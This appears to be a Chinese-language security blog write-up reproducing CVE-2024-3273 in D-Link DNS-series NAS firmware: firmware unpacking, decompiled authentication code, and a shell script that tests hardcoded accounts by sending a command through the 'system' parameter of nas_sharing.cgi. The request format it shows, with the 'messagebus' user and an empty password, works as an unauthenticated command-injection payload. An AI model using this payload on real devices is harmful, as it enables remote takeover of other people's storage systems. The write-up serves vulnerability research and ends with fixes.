,
安全技术iot漏洞复现

漏洞简介

问题存在于“/cgi-bin/nas_sharing.cgi”脚本中,影响其 HTTP GET 请求处理程序组件。 导致该漏洞(编号为 CVE-2024-3273)的两个主要问题是通过硬编码帐户(用户名:“messagebus”和空密码)造成的后门以及通过“system”参数的命令注入问题。 任何攻击者都可以在设备上远程执行命令。

影响范围

DNS-320L 版本1.11、版本1.03.0904.2013、版本1.01.0702.2013 DNS-325 版本1.01 .DNS-327L 版本1.09,版本1.00.0409.2013

DNS-340L 版本1.08

分析的固件环境

DLINK_DNS-340L_1.08b01(1.01.0502.2018)

复现过程

解包固件

1
iot@research:~/Desktop$ binwalk -Me '/home/iot/Desktop/DLINK_DNS-340L_1.08b01(1.01.0502.2018)/DLINK_DNS-340L_1.08b01(1.01.0502.2018)'

image.png

找到问题文件在squashfs-root/squashfs-root/cgi/nas-sharing.cgi

img

分析文件内容

在ida中反编译分析

cgi文件入口通常为cgimain

image.png

由于漏洞的关键是后门账户的无授权访问,所以我们可以搜索关键字符串如’passwd’来找到发生漏洞的关键配置位置

image.png

代码分析

cgiFormString(“system”, s_2, 4096, v2, s_1[0], s_1[1]);

v3 = system(command)向http请求中获取system参数命令执行

只要能通过账号验证就能直接在http请求中执行system获取更高权限

账户验证中则进行了例外的硬编码账户匹配

sub_1E1CC中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
while ( 1 )
  {
    s2 = (const char *)*((_DWORD *)dbg + 1);
    dbg += 4;
    result = strcmp(s1, s2);
    if ( !result )
      break;
    if ( dbg == (const char *)dbg )             // "sshd"
    {
      if ( *a2 )
      {
        _b64_pton(a2, (u_char *)s_1, 0x1000u);
        if ( dword_3E4FC )
        {
          sub_12878("pwd [%s]\n", a2);
          sub_12878("pwd decode[%s]\n", s_1);
        }
      }
      stream = (FILE *)fopen64("/etc/shadow", "r");
      do
      {
        pwent = fgetpwent(stream);
        pwent_1 = pwent;
        if ( !pwent )
          return 0;
      }
1
2
s2 = (const char *)*((_DWORD *)dbg + 1);  // 从dbg+4位置获取字符串
dbg += 4;

结合result = strcmp(s1, s2);if ( !result )程序从dbg中匹配用户名,如果用户名匹配则直接身份认证成功,根据匹配结尾的注释sshd可以知道硬编码用户名可能存在于dbg和sshd之间或者就在两个数据段

image.png

测试硬编码用户脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/bin/sh
echo "=== Searching for Hardcoded Users ==="

# 搜索二进制文件中的字符串
echo "1. Searching in nas_sharing.cgi..."
strings /cgi/nas_sharing.cgi | grep -E "^[a-z]{4,12}$" | sort -u > /tmp/users1.txt

# 搜索配置文件
echo "2. Searching in configuration files..."
find /etc -type f -exec strings {} \; 2>/dev/null | grep -E "^[a-z]{4,12}$" | sort -u >> /tmp/users2.txt

# 搜索其他二进制文件
echo "3. Searching in other binaries..."
find /bin /sbin /usr/bin /usr/sbin -type f -exec strings {} \; 2>/dev/null | grep -E "^[a-z]{4,12}$" | sort -u >> /tmp/users3.txt

# 合并并去重
cat /tmp/users1.txt /tmp/users2.txt /tmp/users3.txt | sort -u > /tmp/all_users.txt

echo "Found potential users:"
cat /tmp/all_users.txt

echo ""
echo "=== Testing Common Users ==="
for user in admin root messagebus test debug guest; do
    echo "Testing: $user"
    export REQUEST_METHOD="POST"
    export CONTENT_TYPE="application/x-www-form-urlencoded"
    if echo "cmd=15&user=$user&passwd=&system=echo FOUND_$user" | ./nas_sharing.cgi 2>/dev/null | grep -q "FOUND_$user"; then
        echo " VULNERABLE USER FOUND: $user"
    fi
done

echo "=== Search Complete ==="
EOF

image.png

找到并测试成功的用户名为messagebus和sshd

修复方案

移除硬编码账户

输入验证和白名单

更新固件

搜索文章

×